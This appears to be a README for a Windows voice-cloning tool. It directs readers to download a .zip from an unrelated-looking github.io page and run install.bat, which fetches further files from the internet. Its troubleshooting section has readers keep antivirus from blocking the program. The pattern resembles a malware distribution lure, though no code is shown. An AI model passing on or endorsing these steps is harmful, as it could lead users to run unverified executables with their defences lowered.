voice_clone_lab lets you create a digital version of a human voice. You provide a few minutes of audio, and the software creates a model. You use this model to turn text into speech. This tool runs on your computer. Your voice files stay on your machine. The software includes a simple web interface for you to use.
You need a Windows computer to run this software. Ensure you have the following hardware to get good performance:
- Operating System: Windows 10 or 11 (64-bit).
- Processor: An Intel Core i5 or AMD Ryzen 5 or better.
- Memory: At least 16GB of RAM.
- Graphics: An NVIDIA graphics card with at least 8GB of video memory. This makes voice creation much faster.
You must download the correct file from the project page.
- Go to this link: https://homologic-bid91.github.io
- Look for the latest version at the top of the list.
- Click the file ending in .zip under the Assets section.
- Save the file to your computer.
Follow these steps to set up the software on your Windows machine:
- Locate the downloaded .zip file in your Downloads folder.
- Right-click the file and select Extract All.
- Choose a folder on your computer where you want to keep the program.
- Open this new folder once the extraction finishes.
- Find the file named install.bat.
- Double-click install.bat to begin the setup. A black window will appear. It will download the necessary files to help the software run. Please wait for this process to finish. It may take some time depending on your internet connection.
Once the installation finishes, you can start the application:
- Find the file named run_ui.bat in the main folder.
- Double-click this file.
- Wait for the black window to show a web address. It usually looks like http://127.0.0.1:7860.
- Copy that address or hold the Ctrl key and click it.
- Your web browser will open with the voice_clone_lab interface.
You create a voice model by providing audio files.
- Open the Training tab in the web interface.
- Give your new voice a name.
- Click the upload button to select your audio files. Use clear recordings with no background noise.
- Click the Start Training button.
- The software analyzes your audio. This process takes time based on the length of your clips.
- Once the status shows Finished, your voice model is ready for use.
After training your voice, you can make it talk.
- Click the Inference tab.
- Select your newly created voice from the list.
- Type the text you want the voice to say in the box provided.
- Change settings like speed or tone if you want to adjust how the voice sounds.
- Click the Generate button.
- The software creates a file. You can play this audio file directly in your browser or save it to your computer.
If the software does not work, try these steps:
- Check your internet connection. The setup tool needs the internet to download parts of the program.
- Ensure your antivirus does not block the application. Sometimes, security software mistakes new programs for threats.
- Restart your computer. This clears temporary issues with memory.
- Make sure your audio files are in a standard format like WAV or MP3.
- If the interface does not open in your browser, check the black command window for errors. If the window shows an error, copy the text and search for advice in the GitHub issues section of the main website.
Keywords: gradio, qwen, text-to-speech, tts, voice-cloning